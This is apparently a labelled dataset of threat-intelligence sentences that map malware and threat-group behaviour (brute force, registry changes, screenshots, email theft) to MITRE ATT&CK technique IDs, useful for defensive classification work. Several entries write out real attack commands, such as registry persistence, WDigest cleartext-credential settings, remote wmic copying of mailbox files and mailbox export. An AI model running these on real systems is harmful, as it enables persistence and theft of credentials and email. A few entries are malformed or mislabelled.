{"text1":"HEXANE has used brute force attacks to compromise valid credentials.","labels":"['T1110']"}
{"text1":"Kinsing has attempted to brute force hosts over SSH.","labels":"['T1110']"}
{"text1":"Lazarus Group has performed brute force attacks against administrator accounts.","labels":"['T1110']"}
{"text1":"OilRig has used brute force techniques to obtain credentials.","labels":"['T1110']"}
{"text1":"Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.","labels":"['T1110']"}
{"text1":"QakBot can conduct brute force attacks to capture credentials.","labels":"['T1110']"}
{"text1":"APT28 has used a brute-force\/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.","labels":"['T1110.001']"}
{"text1":"China Chopper's server component can perform brute force password guessing against authentication portals.","labels":"['T1110.001']"}
{"text1":"CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network.","labels":"['T1110.001']"}
{"text1":"Emotet has been observed using a hard coded list of passwords to brute force user accounts.","labels":"['T1110.001']"}
{"text1":"HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares.","labels":"['T1110.001']"}
{"text1":"Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.","labels":"['T1110.001']"}
{"text1":"P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.","labels":"['T1110.001']"}
{"text1":"Pony has used a small dictionary of common passwords against a collected list of local accounts.","labels":"['T1110.001']"}
{"text1":"SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.","labels":"['T1110.001']"}
{"text1":"Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.","labels":"['T1110.001']"}
{"text1":"APT3 has been known to brute force password hashes to be able to leverage plain text credentials.","labels":"['T1110.002']"}
{"text1":"APT41 performed password brute-force attacks on the local admin account.","labels":"['T1110.002']"}
{"text1":"Dragonfly 2.0 dropped and executed tools used for password cracking, including Hydra and CrackMapExec.","labels":"['T1110.002']"}
{"text1":"Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.","labels":"['T1110.002']"}
{"text1":"During Night Dragon, threat actors used Cain & Abel to crack password hashes.","labels":"['T1110.002']"}
{"text1":"FIN6 has extracted password hashes from ntds.dit to crack offline.","labels":"['T1110.002']"}
{"text1":"Net Crawler uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.","labels":"['T1110.002']"}
{"text1":"APT28 has used a brute-force\/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.","labels":"['T1110.003']"}
{"text1":"APT29 has conducted brute force password spray attacks.","labels":"['T1110.003']"}
{"text1":"APT33 has used password spraying to gain access to target systems.","labels":"['T1110.003']"}
{"text1":"Bad Rabbit\u2019s \"infpub.dat\" file uses NTLM login credentials to brute force Windows machines.","labels":"['T1110.003']"}
{"text1":"Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.","labels":"['T1110.003']"}
{"text1":"CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password.","labels":"['T1110.003']"}
{"text1":"HEXANE has used password spraying attacks to obtain valid credentials.","labels":"['T1110.003']"}
{"text1":"Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.","labels":"['T1110.003']"}
{"text1":"Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.","labels":"['T1110.003']"}
{"text1":"Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.","labels":"['T1110.003']"}
{"text1":"Sandworm Team has used a script to attempt RPC authentication against a number of hosts.","labels":"['T1110.003']"}
{"text1":"Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.","labels":"['T1110.003']"}
{"text1":"Chimera has used credential stuffing against victim's remote services to obtain valid accounts.","labels":"['T1110.004']"}
{"text1":"TrickBot uses brute-force attack against RDP with rdpscanDll module.","labels":"['T1110.004']"}
{"text1":"Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.","labels":"['T1111']"}
{"text1":"LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.","labels":"['T1111']"}
{"text1":"Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens.","labels":"['T1111']"}
{"text1":"Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.","labels":"['T1111']"}
{"text1":"A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.","labels":"['T1112']"}
{"text1":"ADVSTORESHELL is capable of setting and deleting Registry values.","labels":"['T1112']"}
{"text1":"APT19 uses a Port 22 malware variant to modify several Registry keys.","labels":"['T1112']"}
{"text1":"APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.","labels":"['T1112']"}
{"text1":"Agent Tesla can achieve persistence by modifying Registry key entries.","labels":"['T1112']"}
{"text1":"Amadey has overwritten registry keys for persistence.","labels":"['T1112']"}
{"text1":"Attor's dispatcher can modify the Run registry key.","labels":"['T1112']"}
{"text1":"BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.","labels":"['T1112']"}
{"text1":"BADCALL modifies the firewall Registry key \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List\".","labels":"['T1112']"}
{"text1":"Bankshot writes data into the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj\".","labels":"['T1112']"}
{"text1":"BitPaymer can set values in the Registry to help in execution.","labels":"['T1112']"}
{"text1":"Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.","labels":"['T1112']"}
{"text1":"CSPY Downloader can write to the Registry under the \"%windir%\" variable to execute tasks.","labels":"['T1112']"}
{"text1":"Cardinal RAT sets \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" to point to its executable.","labels":"['T1112']"}
{"text1":"Caterpillar WebShell has a command to modify a Registry key.","labels":"['T1112']"}
{"text1":"CharmPower can remove persistence-related artifacts from the Registry.","labels":"['T1112']"}
{"text1":"Clambling can set and delete Registry keys.","labels":"['T1112']"}
{"text1":"Clop can make modifications to Registry keys.","labels":"['T1112']"}
{"text1":"ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.","labels":"['T1112']"}
{"text1":"Conficker adds keys to the Registry at \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\" and various other Registry locations.","labels":"['T1112']"}
{"text1":"CrackMapExec can create a registry key using wdigest.","labels":"['T1112']"}
{"text1":"Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number.","labels":"['T1112']"}
{"text1":"DCSrv has created Registry keys for persistence.","labels":"['T1112']"}
{"text1":"During Operation Honeybee, the threat actors used batch files that modified registry keys.","labels":"['T1112']"}
{"text1":"EVILNUM can make modifications to the Regsitry for persistence.","labels":"['T1112']"}
{"text1":"Earth Lusca modified the registry using the command \"reg add \u201cHKEY_CURRENT_USER\\Environment\u201d \/v UserInitMprLogonScript \/t REG_SZ \/d \u201c[file path]\u201d\" for persistence.","labels":"['T1112']"}
{"text1":"Ember Bear has used an open source batch script to modify Windows Defender registry keys.","labels":"['T1112']"}
{"text1":"Exaramel for Windows adds the configuration to the Registry in XML format.","labels":"['T1112']"}
{"text1":"Explosive has a function to write itself to Registry values.","labels":"['T1112']"}
{"text1":"FELIXROOT deletes the Registry key \"HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open\".","labels":"['T1112']"}
{"text1":"Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.","labels":"['T1112']"}
{"text1":"Gelsemium has the ability to store its components in the Registry.","labels":"['T1112']"}
{"text1":"Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under \"HKCU\\Software\\Microsoft\\Office\\\".","labels":"['T1112']"}
{"text1":"Grandoreiro can store its configuration in the Registry at \"HKCU\\Software\\\" under frequently changing names including \"%USERNAME%\" and \"ToolTech-RM\".","labels":"['T1112']"}
{"text1":"GreyEnergy modifies conditions in the Registry and adds keys.","labels":"['T1112']"}
{"text1":"HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.","labels":"['T1112']"}
{"text1":"HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.","labels":"['T1112']"}
{"text1":"Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.","labels":"['T1112']"}
{"text1":"Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys.","labels":"['T1112']"}
{"text1":"HyperStack can add the name of its communication pipe to \"HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes\".","labels":"['T1112']"}
{"text1":"InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.","labels":"['T1112']"}
{"text1":"KEYMARBLE has a command to create Registry entries for storing data under \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath\".","labels":"['T1112']"}
{"text1":"KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.","labels":"['T1112']"}
{"text1":"Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence.","labels":"['T1112']"}
{"text1":"LoJax has modified the Registry key \"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\" from \"\u2018autocheck autochk *\u2019\" to \"\u2018autocheck autoche *\u2019\".","labels":"['T1112']"}
{"text1":"Magic Hound has modified Registry settings for security tools.","labels":"['T1112']"}
{"text1":"MegaCortex has added entries to the Registry for ransom contact information.","labels":"['T1112']"}
{"text1":"Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.","labels":"['T1112']"}
{"text1":"Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\"with a path to the launcher.","labels":"['T1112']"}
{"text1":"NETWIRE stores its configuration file within the Registry.","labels":"['T1112']"}
{"text1":"NanoCore has the capability to edit the Registry.","labels":"['T1112']"}
{"text1":"Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer`.","labels":"['T1112']"}
{"text1":"Nerex creates a Registry subkey that registers a new service.","labels":"['T1112', 'T1543.003']"}
{"text1":"Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy\" to 1.","labels":"['T1112']"}
{"text1":"Operation Wocao has enabled Wdigest by changing the registry value from 0 to 1.","labels":"['T1112']"}
{"text1":"Orz can perform Registry operations.","labels":"['T1112']"}
{"text1":"PHOREAL is capable of manipulating the Registry.","labels":"['T1112']"}
{"text1":"PLAINTEE uses \"reg add\" to add a Registry Run key for persistence.","labels":"['T1112']"}
{"text1":"Pillowmint has stored its malicious payload in the registry key \"HKLM\\SOFTWARE\\Microsoft\\DRM\".","labels":"['T1112']"}
{"text1":"PipeMon has stored its encrypted payload in the Registry.","labels":"['T1112']"}
{"text1":"PlugX has a module to create, delete, or modify Registry keys.","labels":"['T1112']"}
{"text1":"PoetRAT has made registry modifications to alter its behavior upon execution.","labels":"['T1112']"}
{"text1":"PoisonIvy creates a Registry subkey that registers a new system device.","labels":"['T1112']"}
{"text1":"PolyglotDuke can write encrypted JSON configuration files to the Registry.","labels":"['T1112']"}
{"text1":"PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.","labels":"['T1112']"}
{"text1":"QuasarRAT has a command to edit the Registry on the victim\u2019s machine.","labels":"['T1112']"}
{"text1":"REvil can save encryption parameters and system information to the Registry.","labels":"['T1112']"}
{"text1":"ROKRAT can modify the `HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\` registry key so it can bypass the VB object model (VBOM) on a compromised host.","labels":"['T1112']"}
{"text1":"Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1112']"}
{"text1":"RegDuke can store its encryption key in the Registry.","labels":"['T1112']"}
{"text1":"Regin appears to have functionality to modify remote Registry information.","labels":"['T1112']"}
{"text1":"Remcos has full control of the Registry, including the ability to modify it.","labels":"['T1112']"}
{"text1":"Rover has functionality to remove Registry Run key persistence as a cleanup procedure.","labels":"['T1112']"}
{"text1":"SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).","labels":"['T1112']"}
{"text1":"SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.","labels":"['T1112']"}
{"text1":"SOUNDBITE is capable of modifying the Registry.","labels":"['T1112']"}
{"text1":"SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their \"HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start\" registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.","labels":"['T1112']"}
{"text1":"ShimRat has registered two registry keys for shim databases.","labels":"['T1112']"}
{"text1":"Sibot has installed a second-stage script in the \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\" registry key.","labels":"['T1112']"}
{"text1":"Silence can create, delete, or modify a specified Registry key or value.","labels":"['T1112']"}
{"text1":"SynAck can manipulate Registry keys.","labels":"['T1112']"}
{"text1":"SysUpdate can write its configuration file to \"Software\\Classes\\scConfig\" in either \"HKEY_LOCAL_MACHINE\" or \"HKEY_CURRENT_USER\".","labels":"['T1112']"}
{"text1":"TA505 has used malware to disable Windows Defender through modification of the Registry.","labels":"['T1112']"}
{"text1":"TYPEFRAME can install encrypted configuration data under the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\" and \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\".","labels":"['T1112']"}
{"text1":"Taidoor has the ability to modify the Registry on compromised hosts using \"RegDeleteValueA\" and \"RegCreateKeyExA\".","labels":"['T1112']"}
{"text1":"TajMahal can set the \"KeepPrintedJobs\" attribute for configured printers in \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\" to enable document stealing.","labels":"['T1112']"}
{"text1":"Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to \u201chide\u201d scheduled tasks.","labels":"['T1112']"}
{"text1":"ThreatNeedle can save its configuration data as the following RC4-encrypted Registry key: `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`.","labels":"['T1112']"}
{"text1":"TinyTurla can set its configuration parameters in the Registry.","labels":"['T1112']"}
{"text1":"TrickBot can modify registry entries.","labels":"['T1112']"}
{"text1":"Turla has used the Registry to store encrypted payloads.","labels":"['T1112']"}
{"text1":"Valak has the ability to modify the Registry key \"HKCU\\Software\\ApplicationContainer\\Appsw64\" to store information regarding the C2 server and downloads.","labels":"['T1112']"}
{"text1":"Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\".","labels":"['T1112']"}
{"text1":"WarzoneRAT can create `HKCU\\Software\\Classes\\Folder\\shell\\open\\command` as a new registry key during privilege escalation.","labels":"['T1112']"}
{"text1":"WastedLocker can modify registry values within the \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\" registry key.","labels":"['T1112']"}
{"text1":"Waterbear has deleted certain values from the Registry to load a malicious DLL.","labels":"['T1112']"}
{"text1":"Wizard Spider has modified the Registry key \"HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" by setting the \"UseLogonCredential\" registry value to \"1\" in order to force credentials to be stored in clear text in memory.","labels":"['T1112']"}
{"text1":"Zeus Panda modifies several Registry keys under \"HKCU\\Software\\Microsoft\\Internet Explorer\\ PhishingFilter\\\" to disable phishing filters.","labels":"['T1112']"}
{"text1":"creates a Registry subkey that registers a new system device.","labels":"['T1112', 'T1112']"}
{"text1":"njRAT can create, delete, or modify a specified Registry key or value.","labels":"['T1112']"}
{"text1":"zwShell can modify the Registry.","labels":"['T1112']"}
{"text1":"A JHUHUGIT variant takes screenshots by simulating the user pressing the \"Take Screenshot\" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.","labels":"['T1113']"}
{"text1":"A variant of Zebrocy captures screenshots of the victim\u2019s machine in JPEG and BMP format.","labels":"['T1113']"}
{"text1":"APT28 has used tools to take screenshots from victims.","labels":"['T1113']"}
{"text1":"APT34 has a tool called CANDYKING to capture a screenshot of user's desktop.","labels":"['T1113']"}
{"text1":"APT39 has used a screen capture utility to take screenshots on a compromised host.","labels":"['T1113']"}
{"text1":"Agent Tesla can capture screenshots of the victim\u2019s desktop.","labels":"['T1113']"}
{"text1":"AppleSeed can take screenshots on a compromised host by calling a series of APIs.","labels":"['T1113']"}
{"text1":"Aria-body has the ability to capture screenshots on compromised hosts.","labels":"['T1113']"}
{"text1":"Attor's has a plugin that captures screenshots of the target applications.","labels":"['T1113']"}
{"text1":"Azorult can capture screenshots of the victim\u2019s machines.","labels":"['T1113']"}
{"text1":"BADNEWS has a command to take a screenshot and send it to the C2 server.","labels":"['T1113']"}
{"text1":"BISCUIT has a command to periodically take screenshots of the system.","labels":"['T1113']"}
{"text1":"BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.","labels":"['T1113']"}
{"text1":"BRONZE BUTLER has used a tool to capture screenshots.","labels":"['T1113']"}
{"text1":"BadPatch captures screenshots in .jpg format and then exfiltrates them.","labels":"['T1113']"}
{"text1":"Bandook is capable of taking an image of and uploading the current desktop.","labels":"['T1113']"}
{"text1":"BlackEnergy is capable of taking screenshots.","labels":"['T1113']"}
{"text1":"Cadelspy has the ability to capture screenshots and webcam photos.","labels":"['T1113']"}
{"text1":"Cannon can take a screenshot of the desktop.","labels":"['T1113']"}
{"text1":"Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.","labels":"['T1113']"}
{"text1":"Cardinal RAT can capture screenshots.","labels":"['T1113']"}
{"text1":"Catchamas captures screenshots based on specific keywords in the window\u2019s title.","labels":"['T1113']"}
{"text1":"Chaes can capture screenshots of the infected machine.","labels":"['T1113']"}
{"text1":"Chrommme has the ability to capture screenshots.","labels":"['T1113']"}
{"text1":"Clambling has the ability to capture screenshots.","labels":"['T1113']"}
{"text1":"Cobalt Strike's \"beacon\" payload is capable of capturing screenshots.","labels":"['T1113']"}
{"text1":"Cobalt Strike's Beacon payload is capable of capturing screenshots.","labels":"['T1113']"}
{"text1":"ConnectWise can take screenshots on remote hosts.","labels":"['T1113']"}
{"text1":"CosmicDuke takes periodic screenshots and exfiltrates them.","labels":"['T1113']"}
{"text1":"Crimson contains a command to perform screen captures.","labels":"['T1113']"}
{"text1":"CrossRAT is capable of taking screen captures.","labels":"['T1113']"}
{"text1":"DOGCALL is capable of capturing screenshots of the victim's machine.","labels":"['T1113']"}
{"text1":"Dark Caracal took screenshots using their Windows malware.","labels":"['T1113']"}
{"text1":"Daserf can take screenshots.","labels":"['T1113']"}
{"text1":"Derusbi is capable of performing screen captures.","labels":"['T1113']"}
{"text1":"Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
{"text1":"Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
{"text1":"Dragonfly has performed screen captures of victims.","labels":"['T1113']"}
{"text1":"DustySky captures PNG screenshots of the main screen.","labels":"['T1113']"}
{"text1":"Empire is capable of capturing screenshots on Windows and macOS systems.","labels":"['T1113']"}
{"text1":"EvilGrab has the capability to capture screenshots.","labels":"['T1113']"}
{"text1":"FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.","labels":"['T1113']"}
{"text1":"FlawedAmmyy can capture screenshots.","labels":"['T1113']"}
{"text1":"FruitFly takes screenshots of the user's desktop.","labels":"['T1113']"}
{"text1":"GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.","labels":"['T1113']"}
{"text1":"HALFBAKED can obtain screenshots from the victim.","labels":"['T1113']"}
{"text1":"HotCroissant has the ability to do real time screen viewing on an infected host.","labels":"['T1113']"}
{"text1":"Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.","labels":"['T1113']"}
{"text1":"HyperBro has the ability to take screenshots.","labels":"['T1113']"}
{"text1":"InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.","labels":"['T1113']"}
{"text1":"Janicab captured screenshots and sent them out to a C2 server.","labels":"['T1113']"}
{"text1":"KONNI can take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"Kasidet has the ability to initiate keylogging and screen captures.","labels":"['T1113']"}
{"text1":"Kivars has the ability to capture screenshots on the infected host.","labels":"['T1113']"}
{"text1":"LitePower can take system screenshots and save them to `%AppData%`.","labels":"['T1113']"}
{"text1":"Lizar can take JPEG screenshots of an infected system.","labels":"['T1113']"}
{"text1":"LookBack can take desktop screenshots.","labels":"['T1113']"}
{"text1":"MacMa has used Apple\u2019s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.","labels":"['T1113']"}
{"text1":"MacSpy can capture screenshots of the desktop over multiple monitors.","labels":"['T1113']"}
{"text1":"Machete captures screenshots.","labels":"['T1113']"}
{"text1":"Malware used by Group5 is capable of watching the victim's screen.","labels":"['T1113']"}
{"text1":"Matryoshka is capable of performing screen captures.","labels":"['T1113']"}
{"text1":"Metamorfo can collect screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.","labels":"['T1113']"}
{"text1":"MuddyWater has used malware that can capture screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"NETWIRE can capture the victim's screen.","labels":"['T1113']"}
{"text1":"ObliqueRAT can capture a screenshot of the current screen.","labels":"['T1113']"}
{"text1":"OilRig has a tool called CANDYKING to capture a screenshot of user's desktop.","labels":"['T1113']"}
{"text1":"POORAIM can perform screen capturing.","labels":"['T1113']"}
{"text1":"POWRUNER can capture a screenshot from a victim.","labels":"['T1113']"}
{"text1":"PcShare can take screen shots of a compromised machine.","labels":"['T1113']"}
{"text1":"Peppy can take screenshots on targeted systems.","labels":"['T1113']"}
{"text1":"PoetRAT has the ability to take screen captures.","labels":"['T1113']"}
{"text1":"Prikormka contains a module that captures screenshots of the victim's desktop.","labels":"['T1113']"}
{"text1":"Proton captures the content of the desktop with the screencapture binary.","labels":"['T1113']"}
{"text1":"Pteranodon can capture screenshots at a configurable interval.","labels":"['T1113']"}
{"text1":"Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.","labels":"['T1113']"}
{"text1":"QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\\SymbolSourceSymbols\\icons` or `Temp\\ModeAuto\\icons`.","labels":"['T1113']"}
{"text1":"RCSession can capture screenshots from a compromised host.","labels":"['T1113']"}
{"text1":"RDAT can take a screenshot on the infected system.","labels":"['T1113']"}
{"text1":"ROKRAT can capture screenshots of the infected system using the `gdi32` library.","labels":"['T1113']"}
{"text1":"RTM can capture screenshots.","labels":"['T1113']"}
{"text1":"Remexi takes screenshots of windows of interest.","labels":"['T1113']"}
{"text1":"RemoteUtilities can take screenshots on a compromised host.","labels":"['T1113']"}
{"text1":"RogueRobin has a command named \"$screenshot\" that may be responsible for taking screenshots of the victim machine.","labels":"['T1113']"}
{"text1":"Rover takes screenshots of the compromised system's desktop and saves them to \"C:\\system\\screenshot.bmp\" for exfiltration every 60 minutes.","labels":"['T1113']"}
{"text1":"SHUTTERSPEED can capture screenshots.","labels":"['T1113']"}
{"text1":"SILENTTRINITY can take a screenshot of the current desktop.","labels":"['T1113']"}
{"text1":"SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it \"Filter3.jpg\", and stored it in the local directory.","labels":"['T1113']"}
{"text1":"SMOKEDHAM can capture screenshots of the victim\u2019s desktop.","labels":"['T1113']"}
{"text1":"SharpStage has the ability to capture the victim's screen.","labels":"['T1113']"}
{"text1":"Silence can capture victim screen activity.","labels":"['T1113']"}
{"text1":"Sliver can take screenshots of the victim\u2019s active display.","labels":"['T1113']"}
{"text1":"Socksbot can take screenshots.","labels":"['T1113']"}
{"text1":"StoneDrill can take screenshots.","labels":"['T1113']"}
{"text1":"SysUpdate has the ability to capture screenshots.","labels":"['T1113']"}
{"text1":"T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.","labels":"['T1113']"}
{"text1":"TURNEDUP is capable of taking screenshots.","labels":"['T1113']"}
{"text1":"TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.","labels":"['T1113']"}
{"text1":"The FunnyDream ScreenCap component can take screenshots on a compromised host.","labels":"['T1113']"}
{"text1":"TinyZBot contains screen capture functionality.","labels":"['T1113']"}
{"text1":"Trojan.Karagany can take a desktop screenshot and save the file into \"\\ProgramData\\Mail\\MailAg\\shot.png\".","labels":"['T1113']"}
{"text1":"Turian has the ability to take screenshots.","labels":"['T1113']"}
{"text1":"Ursnif has used hooked APIs to take screenshots.","labels":"['T1113']"}
{"text1":"VERMIN can perform screen captures of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"Valak has the ability to take screenshots on a compromised host.","labels":"['T1113']"}
{"text1":"XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.","labels":"['T1113']"}
{"text1":"XCSSET saves a screen capture of the victim's system with a numbered filename and \".jpg\" extension. Screen captures are taken at specified intervals based on the system.","labels":"['T1113']"}
{"text1":"ZLib has the ability to obtain screenshots of the compromised system.","labels":"['T1113']"}
{"text1":"ZxShell can capture screenshots.","labels":"['T1113']"}
{"text1":"jRAT has the capability to take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"njRAT can capture screenshots of the victim\u2019s machines.","labels":"['T1113']"}
{"text1":"yty collects screenshots of the victim machine.","labels":"['T1113']"}
{"text1":"Magic Hound has compromised email credentials in order to steal sensitive data.","labels":"['T1114']"}
{"text1":"Silent Librarian has exfiltrated entire mailboxes from compromised accounts.","labels":"['T1114']"}
{"text1":"APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.","labels":"['T1114.001']"}
{"text1":"Carbanak searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.","labels":"['T1114.001']"}
{"text1":"Chimera has harvested data from victim's e-mail including through execution of \"wmic \/node:<ip> process call create \"cmd \/c copy c:\\Users\\<username>\\<path>\\backup.pst c:\\windows\\temp\\backup.pst\" copy \"i:\\<path>\\<username>\\My Documents\\<filename>.pst\"\ncopy\".","labels":"['T1114.001']"}
{"text1":"CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.","labels":"['T1114.001']"}
{"text1":"Crimson contains a command to collect and exfiltrate emails from Outlook.","labels":"['T1114.001']"}
{"text1":"Emotet has been observed leveraging a module that scrapes email data from Outlook.","labels":"['T1114.001']"}
{"text1":"Empire has the ability to collect emails on a target system.","labels":"['T1114.001']"}
{"text1":"Magic Hound has collected .PST archives.","labels":"['T1114.001']"}
{"text1":"Pupy can interact with a victim\u2019s Outlook session and look through folders and emails.","labels":"['T1114.001']"}
{"text1":"QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.","labels":"['T1114.001']"}
{"text1":"Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).","labels":"['T1114.001']"}
{"text1":"APT28 has collected emails from victim Microsoft Exchange servers.","labels":"['T1114.002']"}
{"text1":"APT29 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\".","labels":"['T1114.002']"}
{"text1":"Chimera has harvested data from remote mailboxes including through execution of \"\\\\<hostname>\\c$\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook*.ost\".","labels":"['T1114.002']"}
{"text1":"Dragonfly 2.0 accessed email accounts using Outlook Web Access.","labels":"['T1114.002']"}
{"text1":"FIN4 has accessed and hijacked online email communications using stolen credentials.","labels":"['T1114.002']"}
{"text1":"HAFNIUM has used web shells to export mailbox data.","labels":"['T1114.002']"}
{"text1":"Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.","labels":"['T1114.002']"}
{"text1":"Kimsuky has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.","labels":"['T1114.002']"}
